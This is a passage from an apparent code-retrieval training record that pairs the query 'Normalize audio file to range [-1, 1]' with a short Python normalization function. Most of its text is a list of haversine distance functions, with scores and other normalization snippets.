Use 3956 for miles\n\treturn c*r", "def haversine(lon1, lat1, lon2, lat2):\n from math import radians, cos, sin, asin, sqrt\n # convert decimal degrees to radians \n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n\n # haversine formula \n dlon = lon2 - lon1 \n dlat = lat2 - lat1 \n a = sin(dlat/2)**2 + cos(lat1) * cos(lat2) * sin(dlon/2)**2\n c = 2 * asin(sqrt(a)) \n r = 6371 # Radius of earth in kilometers. Use 3956 for miles\n return c * r", "def haversine(lon1, lat1, lon2, lat2):\n # convert decimal degrees to radians \n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n\n # haversine formula \n dlon = lon2 - lon1 \n dlat = lat2 - lat1 \n a = sin(dlat/2)**2 + cos(lat1) * cos(lat2) * sin(dlon/2)**2\n c = 2 * asin(sqrt(a)) \n r = 6371 # Radius of earth in kilometers. Use 3956 for miles\n return c * r", "def haversine(lon1, lat1, lon2, lat2):\n # convert decimal degrees to radians \n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n\n # haversine formula \n dlon = lon2 - lon1 \n dlat = lat2 - lat1 \n a = sin(dlat/2.)**2. + cos(lat1) * cos(lat2) * sin(dlon/2.)**2.\n c = 2. * asin(sqrt(a)) \n\n # 6378.1 km is the radius of the Earth = 6378100 m\n m = 6378100. * c\n return m", "def haversine(lon1, lat1, lon2, lat2):\n # convert decimal degrees to radians \n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n\n # haversine formula \n dlon = lon2 - lon1\n dlat = lat2 - lat1\n a = sin(dlat/2)**2 + cos(lat1) * cos(lat2) * sin(dlon/2)**2\n c = 2 * asin(sqrt(a))\n r = 3956 # Radius of earth in miles. Use 6371 for kms\n return c * r", "def haversine(lon1, lat1, lon2, lat2):\n # convert decimal degrees to radians \n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n dlon = lon2 - lon1 \n dlat = lat2 - lat1 \n a = sin(dlat/2)**2 + cos(lat1) * cos(lat2) * sin(dlon/2)**2\n c = 2 * asin(sqrt(a)) \n r = 6371 # Radius of earth in kilometers. Use 3956 for miles\n return c * r", "def haversine(lon1, lat1, lon2, lat2):\n # convert decimal degrees to radians\n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n # haversine formula\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n a = sin(dlat/2)**2 + cos(lat1) * cos(lat2) * sin(dlon/2)**2\n c = 2 * asin(sqrt(a))\n r = 6371 # Radius of earth in kilometers. Use 3956 for miles\n return c * r", "def haversine(lon1, lat1, lon2, lat2):\n # convert decimal degrees to radians\n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n\n # haversine formula\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n a = sin(dlat/2)**2 + cos(lat1) * cos(lat2) * sin(dlon/2)**2\n c = 2 * asin(sqrt(a))\n r = 6371 # Radius of earth in kilometers. Use 3956 for miles\n return c * r", "def haversine(lon1, lat1, lon2, lat2):\n # convert decimal degrees to radians\n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n\n # haversine formula\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n a = sin(dlat/2)**2 + cos(lat1) * cos(lat2) * sin(dlon/2)**2\n c = 2 * asin(sqrt(a))\n r = 6371 # Radius of earth in kilometers. 
Use 3956 for miles\n return c * r", "def haversine(lon1, lat1, lon2, lat2): # 经度1,纬度1,经度2,纬度2 (十进制度数)\n lon1 = float(lon1)\n lat1 = float(lat1)\n lon2 = float(lon2)\n lat2 = float(lat2)\n\n if lon1 == 0 or lat1 == 0:\n return float(999999999)\n\n if lon2 == 0 or lon2 ==[]:\n return float(999999999)\n\n if lat2 == 0 or lat2 ==[]:\n return float(999999999)\n\n\n # 将十进制度数转化为弧度\n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n # haversine公式\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n a = sin(dlat / 2) ** 2 + cos(lat1) * cos(lat2) * sin(dlon / 2) ** 2\n c = 2 * asin(sqrt(a))\n r = 6371 # 地球平均半径,单位为公里\n return c * r * 1000", "def haversine(lat1, lon1, lat2, lon2):\n # convert decimal degrees to radians\n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n\n # haversine formula\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n a = sin(dlat/2)**2 + cos(lat1) * cos(lat2) * sin(dlon/2)**2\n c = 2 * asin(sqrt(a))\n r = 6371 # Radius of earth in kilometers. Use 3956 for miles\n return c * r", "def haversine(lat1: float, lon1: float, lat2: float, lon2: float) -> float:\n lat1, lon1, lat2, lon2, = map(radians, [lat1, lon1, lat2, lon2])\n # average earth radius\n R = 6372.8\n dlat = lat2 - lat1\n dlon = lon2 - lon1\n sin_lat_squared = sin(dlat * 0.5) * sin(dlat * 0.5)\n sin_lon_squared = sin(dlon * 0.5) * sin(dlon * 0.5)\n computation = asin(sqrt(sin_lat_squared + sin_lon_squared * cos(lat1) * cos(lat2)))\n d = 2 * R * computation\n return d", "def haversine(lon1, lat1, lon2, lat2):\n # convert decimal degrees to radians\n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n # haversine formula\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n a = sin(dlat / 2) ** 2 + cos(lat1) * cos(lat2) * sin(dlon / 2) ** 2\n c = 2 * asin(sqrt(a))\n km = 6367 * c\n return convert_km_to_mi(km)", "def haversine(lat1, lon1, lat2, lon2):\r\n # convert decimal degrees to radians\r\n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\r\n\r\n # haversine formula\r\n dlon = lon2 - lon1\r\n dlat = lat2 - lat1\r\n a = sin(dlat / 2) ** 2 + cos(lat1) * cos(lat2) * sin(dlon / 2) ** 2\r\n c = 2 * asin(sqrt(a))\r\n r = 3959 # Radius of earth in miles\r\n return c * r", "def haversine(lon1, lat1, lon2, lat2):\n # convert decimal degrees to radians\n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n\n # haversine formula\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n a = sin(dlat/2)**2 + cos(lat1) * cos(lat2) * sin(dlon/2)**2\n c = 2 * asin(sqrt(a))\n r = 6371 # Radius of earth in kilometers. Use 3956 for miles\n\n return c * r", "def haversine(lon1, lat1, lon2, lat2):\n from math import radians, cos, sin, asin, sqrt\n # convert decimal degrees to radians \n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n \n # haversine formula \n dlon = lon2 - lon1 \n dlat = lat2 - lat1 \n a = sin(dlat/2)**2 + cos(lat1) * cos(lat2) * sin(dlon/2)**2\n c = 2 * asin(sqrt(a)) \n r = 3956 # Radius of earth in MILES. 
Use 6371 for KM\n return round(c * r, 4)", "def haversine(latitude_1, longitude_1, latitude_2, longitude_2):\n\n radius = 2.5 # In Kilometer\n # Degree to radians\n latitude_1, longitude_1, latitude_2, longitude_2 = \\\n map(radians, [latitude_1, longitude_1, latitude_2, longitude_2])\n\n # Haversine formula\n d_latitude = latitude_2 - latitude_1\n d_longitude = longitude_2 - longitude_1\n a = sin(d_latitude / 2) ** 2 + cos(latitude_1) * cos(latitude_2) * sin(d_longitude / 2) ** 2\n c = 2 * asin(sqrt(a))\n r = 6371 # Radius of earth in kilometers\n return c * r <= radius", "def haversine(lon1, lat1, lon2, lat2): # 经度1,纬度1,经度2,纬度2 \n # 将十进制度数转化为弧度 \n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2]) \n \n # haversine公式 \n dlon = lon2 - lon1 \n dlat = lat2 - lat1 \n a = sin(dlat/2)**2 + cos(lat1) * cos(lat2) * sin(dlon/2)**2 \n c = 2 * asin(sqrt(a)) \n r = 6371 # 地球平均半径,单位为公里 \n return c * r", "def haversine(lat1, lon1, lat2, lon2):\n # convert decimal degrees to radians \n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n\n # haversine formula \n dlon = lon2 - lon1 \n dlat = lat2 - lat1 \n a = sin(dlat/2)**2 + cos(lat1) * cos(lat2) * sin(dlon/2)**2\n c = 2 * asin(sqrt(a)) \n r = 3956 # Radius of earth in kilometers. Use 3956 for miles\n return c * r * 1.60934", "def haversine(lon1, lat1, lon2, lat2):\n # convert decimal degrees to radians\n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n\n # haversine formula\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n a = sin(dlat/2)**2 + cos(lat1) * cos(lat2) * sin(dlon/2)**2\n c = 2 * asin(sqrt(a))\n r = 6371 # Radius of earth in kilometers. Use 3956 for miles\n return c * r * 1000", "def haversine(lon1, lat1, lon2, lat2):\n\n Re = 6378.137\n\n # convert decimal degrees to radians\n deg2rad = np.pi / 180.\n lon1 = np.array(lon1) * deg2rad\n lat1 = np.array(lat1) * deg2rad\n lon2 = np.array(lon2) * deg2rad\n lat2 = np.array(lat2) * deg2rad\n\n if lon2.shape:\n N = lon2.shape[0]\n lon1 = np.repeat(lon1, N)\n lat1 = np.repeat(lat1, N)\n\n # haversine formula\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n a = np.sin(dlat / 2.)**2. + np.cos(lat1) * \\\n np.cos(lat2) * np.sin(dlon / 2.)**2.\n c = 2. * np.arcsin(np.sqrt(a))\n km = Re * c\n return km", "def haversine(lon1,lat1,lon2,lat2,yy_lon,yy_lat):\n # convert decimal to radians\n lon1b, lat1b, lon2b, lat2b = map(radians, [lon1, lat1, lon2, lat2])\n # haversine formula\n dlon = lon2b-lon1b\n dlat = lat2b-lat1b\n\n a = sin(dlat/2)**2 + cos(lat1b)*cos(lat2b)*sin(dlon/2)**2\n c = 2*asin(sqrt(a))\n r = 6371. 
# radius of Earth in km\n\n return c*r,lat2,lon2,yy_lat,yy_lon,lat1,lon1", "def haversine_array(lon1, lat1, lon2, lat2):\n R = 6371.0 # radius of the earth in km\n\n lon1, lat1, lon2, lat2 = map(np.radians, [lon1, lat1, lon2, lat2])\n\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n\n a = np.sin(dlat/2.0)**2 + np.cos(lat1) * np.cos(lat2) * np.sin(dlon/2.0)**2\n\n c = 2 * np.arcsin(np.sqrt(a))\n km = R * c\n return km", "def haversine(lon1, lat1, lon2, lat2):\n \n # convert decimal degrees to radians\n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n \n # haversine formula\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n a = sin(dlat/2)**2 + cos(lat1) * cos(lat2) * sin(dlon/2)**2\n c = 2 * asin(sqrt(a))\n r = 3956 #radius of earth in miles mean of poles and equator radius\n return c * r", "def haversine_distance(loc1_lat, loc1_lon, loc1_alt, loc2_lat, loc2_lon, loc2_alt):\n R = 6372797.560856 # radius of the earth in meters\n R = R + loc2_alt - loc1_alt\n\n lat_arc = math.radians(loc1_lat - loc2_lat)\n lon_arc = math.radians(loc1_lon - loc2_lon)\n\n lat_h = math.sin(lat_arc * 0.5)\n lat_h = lat_h * lat_h\n\n lon_h = math.sin(lon_arc * 0.5)\n lon_h = lon_h * lon_h\n\n tmp = math.cos(math.radians(loc1_lat)) * math.cos(math.radians(loc2_lat))\n rad = 2.0 * math.asin(math.sqrt(lat_h + tmp * lon_h))\n\n return rad * R", "def distance(lon1, lat1, lon2, lat2):\n # convert decimal degrees to radians\n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n # haversine formula\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n a = sin(dlat / 2)**2 + cos(lat1) * cos(lat2) * sin(dlon / 2)**2\n c = 2 * asin(sqrt(a))\n m = 6367 * c * 1000\n return m", "def haversine(lat2, lon2):\n\n lat1 = 53.342998628\n lon1 = -6.256165642\n\n lon1, lat1, lon2, lat2 = map(np.radians, [lon1, lat1, lon2, lat2])\n\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n\n a = np.sin(dlat / 2.0) ** 2 + np.cos(lat1) * np.cos(lat2) * np.sin(dlon / 2.0) ** 2\n\n c = 2 * np.arcsin(np.sqrt(a))\n km = 6367 * c\n\n return km", "def haversine(lat1, lon1, lat2, lon2, radius=6371):\n from math import radians, sin, cos, sqrt, asin\n dLat = radians(lat2 - lat1)\n dLon = radians(lon2 - lon1)\n lat1 = radians(lat1)\n lat2 = radians(lat2)\n c = 2 * asin(sqrt(sin(dLat / 2) ** 2 + cos(lat1) * cos(lat2) * sin(dLon / 2) ** 2))\n return radius * c * 1000 # return in meters", "def haversine(lon1, lat1, lon2, lat2):\n # convert decimal degrees to radians\n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n\n # haversine formula\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n a = sin(dlat/2)**2 + cos(lat1) * cos(lat2) * sin(dlon/2)**2\n c = 2 * asin(sqrt(a))\n r = 3956 # Radius of earth in kilometers. Use 3956 for miles\n return c * r * 5280", "def haversine(lon1, lat1, lon2, lat2): # 经度1,纬度1,经度2,纬度2 (十进制度数)\n # 将十进制度数转化为弧度\n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n\n # haversine公式\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n a = sin(dlat / 2) ** 2 + cos(lat1) * cos(lat2) * sin(dlon / 2) ** 2\n c = 2 * asin(sqrt(a))\n r = 6371 # 地球平均半径,单位为公里\n return c * r * 1000", "def haversine(self, lon1, lat1, lon2, lat2):\n lon1, lat1, lon2, lat2 = Decimal(lon1), Decimal(lat1), Decimal(lon2), Decimal(lat2)\n\n # convert decimal degrees to radians\n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n\n # haversine formula\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n a = sin(dlat / 2) ** 2 + cos(lat1) * cos(lat2) * sin(dlon / 2) ** 2\n c = 2 * asin(sqrt(a))\n r = 6371 # Radius of earth in kilometers. 
Use 3956 for miles\n return c * r", "def harversine(lon1, lat1, lon2, lat2):\n # convert decimal degrees to radians\n lon1, lat1, lon2, lat2 = map(math.radians, [lon1, lat1, lon2, lat2])\n # harversine formula\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n a = math.sin(dlat/2.)**2. + math.cos(lat1) * math.cos(lat2) * math.sin(dlon/2.)**2.\n c = 2. * math.asin(math.sqrt(a))\n km = 6371. * c # radius of earth\n return km", "def distance(lon1, lat1, lon2, lat2):\n # convert decimal degrees to radians \n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n # haversine formula \n dlon = lon2 - lon1 \n dlat = lat2 - lat1 \n a = sin(dlat/2)**2 + cos(lat1) * cos(lat2) * sin(dlon/2)**2\n c = 2 * asin(sqrt(a)) \n km = 6367 * c\n return km", "def aversine(lon1, lat1, lon2, lat2):\n\n lon1 = float(lon1)\n lon2 = float(lon2)\n lat1 = float(lat1)\n lat2 = float(lat2)\n\n # convert decimal degrees to radians\n lon1, lat1, lon2, lat2 = map(math.radians, [lon1, lat1, lon2, lat2])\n # haversine formula\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n a = math.sin(dlat / 2) ** 2 + math.cos(lat1) * math.cos(lat2) * math.sin(dlon / 2) ** 2\n c = 2 * math.asin(math.sqrt(a))\n meters = 6356988 * c\n\n return meters", "def get_distance_from_point(long1, lati1, long2, lati2):\n # convert decimal degrees to radians\n lon1, lat1, lon2, lat2 = map(radians, [long1, lati1, long2, lati2])\n\n # haversine formula\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n a = sin(dlat / 2) ** 2 + cos(lat1) * cos(lat2) * sin(dlon / 2) ** 2\n c = 2 * asin(sqrt(a))\n r = 6371 # Radius of earth in kilometers. Use 3956 for miles\n return c * r", "def haversine1(self, lon1, lat1, lon2, lat2): # 经度1,纬度1,经度2,纬度2 (十进制度数)\n # 将十进制度数转化为弧度\n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n # haversine公式\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n a = sin(dlat / 2) ** 2 + cos(lat1) * cos(lat2) * sin(dlon / 2) ** 2\n c = 2 * asin(sqrt(a))\n r = 6371 # 地球平均半径,单位为公里\n return c * r * 1000", "def haversine(\n lat1: float, lon1: float, lat2: float, lon2: float, *, unit: str = \"metric\"\n) -> float:\n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n\n # haversine formula\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n calc_a = sin(dlat / 2) ** 2 + cos(lat1) * cos(lat2) * sin(dlon / 2) ** 2\n calc_c = 2 * asin(sqrt(calc_a))\n\n if unit == \"metric\":\n return AVG_EARTH_RADIUS_METRIC * calc_c\n return AVG_EARTH_RADIUS_IMPERIAL * calc_c", "def haversine(self,loc1,loc2):\n R = 6371. 
# Radius of earth in kilometers\n lat1 = np.radians(loc1[0])\n lat2 = np.radians(loc2[0])\n dlat = lat2 - lat1\n dlon = np.radians(loc2[1] - loc1[1])\n\n a = np.sin(dlat/2)**2 + np.cos(lat1) * np.cos(lat2) * np.sin(dlon/2)**2\n c = 2 * np.arctan2(np.sqrt(a), np.sqrt(1-a))\n return R * c", "def haversine(origin, destination):\n lat1, lon1 = origin\n lat2, lon2 = destination\n radius = 6371000\n dlat = math.radians(lat2 - lat1)\n dlon = math.radians(lon2 - lon1)\n a = math.sin(dlat / 2) * math.sin(dlat / 2) + math.cos(math.radians(lat1)) * math.cos(\n math.radians(lat2)) * math.sin(dlon / 2) * math.sin(dlon / 2)\n c = 2 * math.atan2(math.sqrt(a), math.sqrt(1 - a))\n d = radius * c\n\n return d", "def Haversine(c1, c2):\n lat1 = float(c1.split(\",\")[0])\n lon1 = float(c1.split(\",\")[1])\n lat2 = float(c2.split(\",\")[0])\n lon2 = float(c2.split(\",\")[1])\n\n\n #convert degrees into radians\n lat1, lon1, lat2, lon2 = map(radians, [lat1, lon1, lat2, lon2])\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n a = sin(dlat/2)**2 + cos(lat1) * cos(lat2) * sin(dlon/2)**2\n c = 2 * asin(sqrt(a)) \n r = 3959.87433 # Radius of earth in miles\n return c * r", "def haversine(lon1, lat1, lon2, lat2):\n\tdirectionDict = {'North':[0,90],'East':[90,180],'South':[180,270],'West':[270,360]}\n\tlon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n\n\t# haversine formula \n\tdlon = lon2 - lon1 \n\tdlat = lat2 - lat1 \n\ta = sin(dlat/2)**2 + cos(lat1) * cos(lat2) * sin(dlon/2)**2\n\tc = 2 * asin(sqrt(a)) \n\tr = 6371 # Radius of earth in kilometers. Use 3956 for miles\n\n\t\"\"\"Calculate bearing (angle) between 2 coordinates\"\"\"\n\tbearing = atan2(sin(lon2-lon1)*cos(lat2), cos(lat1)*sin(lat2)-sin(lat1)*cos(lat2)*cos(lon2-lon1))\n\tbearing = degrees(bearing)\n\tbearing = (bearing + 360) % 360\n\n\tdirection = \"\"\n\tfor k,v in directionDict.iteritems():\n\t\tif bearing >= v[0] and bearing < v[1]:\n\t\t\tdirection = k\n\n\treturn c * r, bearing, direction", "def haversine(lon1, lat1, lon2, lat2, in_miles=True):\n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n a = sin(dlat/2.0)**2 + cos(lat1) * cos(lat2) * sin(dlon/2.0)**2\n c = 2.0 * asin(sqrt(a))\n R = 3956.0 if in_miles else 6371.0\n return c * R", "def haversine(coordinate_1, coordinate_2):\n lat1, lon1, lat2, lon2 = coordinate_1[0], coordinate_1[1], coordinate_2[0], coordinate_2[1]\n\n # convert decimal degrees to radians\n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n\n # haversine formula\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n a = sin(dlat / 2) ** 2 + cos(lat1) * cos(lat2) * sin(dlon / 2) ** 2\n c = 2 * asin(sqrt(a))\n r = 6373 # Radius of earth in kilometers. Use 3956 for miles\n return c * r", "def dist(lat1, lon1, lat2, lon2):\n # convert decimal degrees to radians \n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n\n # haversine formula \n dlon = lon2 - lon1 \n dlat = lat2 - lat1 \n a = sin(dlat/2)**2 + cos(lat1) * cos(lat2) * sin(dlon/2)**2\n c = 2 * asin(sqrt(a)) \n r = 6371 # Radius of earth in kilometers. 
Use 3956 for miles\n return c * r", "def earth_haversine(p: np.ndarray, q: np.ndarray) -> float:\n earth_radius = 6378137.0\n return haversine(np.radians(p), np.radians(q)) * earth_radius", "def haversine(coord1, coord2, r_E=6371):\n\n def _to_rad(deg):\n return deg * np.pi / 180.\n \n lat1, lat2 = _to_rad(coord1[:, 0]), _to_rad(coord2[:, 0])\n dlat = _to_rad(coord1[:, 0] - coord2[:, 0])\n dlon = _to_rad(coord1[:, 1] - coord2[:, 1])\n\n a = np.sin(dlat / 2.) ** 2 + np.cos(lat1) * np.cos(lat2) * np.sin(dlon / 2.) ** 2\n c = 2. * np.arctan2(np.sqrt(a), np.sqrt(1 - a)) \n return r_E * c", "def calcDistance(lat1, lon1, lat2, lon2):\n # convert decimal degrees to radians \n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n # haversine formula \n dlon = lon2 - lon1 \n dlat = lat2 - lat1 \n a = sin(dlat/2)**2 + cos(lat1) * cos(lat2) * sin(dlon/2)**2\n c = 2 * asin(sqrt(a)) \n km = 6367 * c\n return km * 1000", "def dist_between(lon1, lat1, lon2, lat2):\n # convert decimal degrees to radians \n lon1, lat1, lon2, lat2 = map(np.radians, [lon1, lat1, lon2, lat2])\n # haversine formula \n dlon = lon2 - lon1 \n dlat = lat2 - lat1 \n a = np.sin(dlat/2)**2 + np.cos(lat1) * np.cos(lat2) * np.sin(dlon/2)**2\n c = 2 * np.arcsin(np.sqrt(a)) \n km = 6367 * c\n return km", "def getDist(lat1,long1,lat2,long2):\n\tlat1 = math.radians(lat1)\n\tlong1 = math.radians(long1)\n\tlat2 = math.radians(lat2)\n\tlong2 = math.radians(long2)\n\tR = 6371 # km\n\td = cmath.acos(cmath.sin(lat1) * cmath.sin(lat2) + \\\n\tcmath.cos(lat1) * cmath.cos(lat2) *\n\tcmath.cos(long2 - long1)) * R\n\treturn abs(d) # cast to float", "def haversine(p: np.ndarray, q: np.ndarray) -> float:\n d = q - p\n a = (math.sin(d[0] / 2.0) ** 2 + math.cos(p[0]) * math.cos(q[0]) * math.sin(d[1] / 2.0) ** 2)\n\n c = 2 * math.atan2(math.sqrt(a), math.sqrt(1.0 - a))\n return c", "def haversin(lat1, lon1, lat2, lon2):\n r = 3956.545 # Radius of the Earth in miles\n\n # Conver to radians\n lat1 = np.pi/180*lat1\n lon1 = np.pi/180*lon1\n lat2 = np.pi/180*lat2\n lon2 = np.pi/180*lon2\n\n # Haversin formula\n d = 2*r*np.arcsin(np.sqrt(\\\n np.sin((lat2 - lat1)/2)**2 + \\\n np.cos(lat1) * np.cos(lat2)*\\\n np.sin((lon2 - lon1)/2)**2))\n return d", "def calculateDistanceBetweenPoints(lat1,lon1,lat2,lon2):\n\treturn Geodesic.WGS84.Inverse(lat1,lon1, lat2, lon2)['s12']" ]
[ "0.7411768", "0.7283244", "0.7281911", "0.7275467", "0.7160516", "0.7140681", "0.71359766", "0.706824", "0.7068029", "0.7050806", "0.70261496", "0.70184296", "0.69995123", "0.6997063", "0.69919103", "0.6987301", "0.69823533", "0.69742984", "0.6964179", "0.6947977", "0.69358677", "0.69334304", "0.69272494", "0.69211227", "0.6918978", "0.6909981", "0.6909981", "0.6901357", "0.6889008", "0.68778425", "0.6874001", "0.68734324", "0.68640924", "0.6861169", "0.6858368", "0.6854334", "0.6842126", "0.6839374", "0.68383026", "0.68373865", "0.6834038", "0.6821812", "0.68176484", "0.68166286", "0.68137693", "0.6813559", "0.681231", "0.68098414", "0.68076986", "0.6797198", "0.679279", "0.6790279", "0.6788969", "0.67869496", "0.6779699", "0.6771567", "0.6771567", "0.677075", "0.6770084", "0.6768476", "0.67624235", "0.6761354", "0.67589474", "0.6757291", "0.67524016", "0.6750482", "0.67486525", "0.67407066", "0.6737854", "0.6728046", "0.6720459", "0.6713002", "0.6710954", "0.67070025", "0.66998595", "0.6686567", "0.6685601", "0.667424", "0.6668778", "0.6626024", "0.66097885", "0.65984124", "0.65743935", "0.65095794", "0.64745677", "0.6464404", "0.6438525", "0.64315045", "0.642898", "0.6427349", "0.6425216", "0.64188", "0.6379387", "0.63729846", "0.6353277", "0.6343097", "0.633548", "0.63291574", "0.63105005", "0.6306423" ]
0.71147573
7
Normalize audio file to range [-1, 1]
def normalize(audio):\n    norm = audio/max(audio)\n    return norm
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def normalize(filename,wout=True):\n n, data, data_dB,sr,ch=inputwav(filename)\n if ch==1:\n diff=0-max(data_dB)\n if ch==2:\n d1=0-max(data_dB[:,0])\n d2=0-max(data_dB[:,1])\n diff=max(d1,d2)\n print('Adding '+str(diff)+' dB...')\n data_dB_norm=data_dB+diff\n data_norm=10.0**((data_dB_norm)/20.0)\n #sign the bits appropriately:\n for k in range (ch):\n for i in range (n):\n if data[i,k]<0.0:\n data_norm[i,k]=-1.0*data_norm[i,k]\n if wout==True:\n print('Exporting...')\n sf.write(filename[0:len(filename)-4]+'_normalized.wav',data_norm,sr,'PCM_16')\n print('Done!')\n return data_norm", "def normalize(wav, flux):\n return flux / flux.max() # maximum flux = 1\n\n # flux_norm = flux[wav>wav_norm][0]\n # return flux / flux_norm", "def normalize_audio(audio_path: str, output_path: str, name: str):\n sound = AudioSegment.from_file(audio_path + os.sep + name + '.wav',\n \"wav\")\n change_in_d_bfs = (-20.0) - sound.dBFS\n sound = sound.apply_gain(change_in_d_bfs)\n sound.export(output_path + os.sep + name + '.wav', format=\"wav\")", "def normalize(volume):\n\n MIN_BOUND = 0\n MAX_BOUND = 256.0\n volume = (volume - MIN_BOUND) /(MAX_BOUND - MIN_BOUND)\n volume[volume > 1] = 1 #Clip everything larger than 1 and 0\n volume[volume < 0] = 0\n volume = (volume*255).astype('uint8')\n\n return volume", "def normalize(volume):\n\n MIN_BOUND = 0\n MAX_BOUND = 256.0\n volume = (volume - MIN_BOUND) /(MAX_BOUND - MIN_BOUND)\n volume[volume > 1] = 1 #Clip everything larger than 1 and 0\n volume[volume < 0] = 0\n volume = (volume*255).astype('uint8')\n\n return volume", "def normalize(volume):\n max = np.amax(volume)\n if max == 0:#Fixes dividing by 0 error if nothing in the volume\n return volume.astype(np.uint8)\n\n normalized = volume * (255.0 / max)\n normalized = np.round(normalized).astype(np.uint8)\n return normalized", "def normalize_sample(sample_data):\n BASE = 255\n sample_data = np.array(sample_data, dtype='float32')\n return sample_data/BASE", "def normalize(self,arr):\n arr = arr/(arr.max()/255.0)\n return arr", "def normalize(image):\n return image / 127.5 - 1.", "def normalize(image):\r\n return image / 127.5 - 1.", "def normalize_frames(frames):\n new_frames = frames.astype(np.float32)\n new_frames /= (255 / 2)\n new_frames -= 1\n\n return new_frames", "def normalize_signal(signal):\n gain = 1.0 / (np.max(np.abs(signal)) + 1e-9)\n return signal * gain", "def normalize(array):\n high = array.max()\n low = array.min()\n rng = high - low\n array[:] = 1.0 - ((high - array) / rng)", "def normalize_01(x):\n return x / 255.0", "def normalise(image):", "def normalize(img):\n img = np.clip(img, 0, 255).astype(np.uint8)\n return img / 255", "def normalize(sample, maxval):\n sample = (2 * (sample.astype(np.float32) / maxval) - 1.) 
* 1024\n #sample = sample / np.std(sample)\n return sample", "def _normalize_(x: np.array) -> np.array:\n if x.max() != 0:\n x = x / x.max()\n return np.clip(x, 0, 1)# ensure that no values are >1\n else:\n raise ZeroDivisionError('Image Normalization')", "def normalize(array):\n\treturn array/np.max(array)", "def normalize(x):\n # TODO: Implement Function\n \n return x/255", "def normalize_volumes_mixmode(directory, amplitude=0.08, ext='.wav'):\n subdirectories = [x[0] for x in os.walk(directory)]\n for subdirectory in subdirectories:\n os.system(f\"normalize-audio -w 16 -a {amplitude} -b '{subdirectory}/'*{ext}\")", "def normalize(img):\n img = img.astype(np.float32)\n img -= img.min()\n img /= img.max()\n img *= 255\n img = img.astype(np.uint8)\n\n return img", "def normalize(self, ref=1):\n maximum = max(abs(self.intensities))\n return Spectrum(self.wavelengths, ref * self.intensities/maximum)", "def normalize(array):\n array_min, array_max = array.min(), array.max()\n return ((array - array_min)/(array_max - array_min))", "def normalize_audio_feature(audio_feature, per_feature=False):\n axis = 0 if per_feature else None\n mean = np.mean(audio_feature, axis=axis)\n std_dev = np.std(audio_feature, axis=axis) + 1e-9\n normalized = (audio_feature - mean) / std_dev\n return normalized", "def normalize(arr):\n arr = arr.astype('float')\n # Do not touch the alpha channel\n for i in range(1):\n minval = arr[...,i].min()\n maxval = arr[...,i].max()\n if minval != maxval:\n arr[...,i] -= minval\n arr[...,i] *= (255.0/(maxval-minval))\n return arr", "def normalize(av, vmin=0., vmax=1.):\n if vmin == vmax:\n return np.ones_like(av)*vmin\n elif vmax < vmin:\n warnings.warn(\"swapping vmin and vmax, because vmax < vmin.\")\n vmin, vmax = vmax, vmin\n\n norm_one = (av - np.min(av))/(np.max(av)-np.min(av))\n return norm_one * (vmax-vmin) + vmin", "def normalize(batch_img: np.ndarray) -> 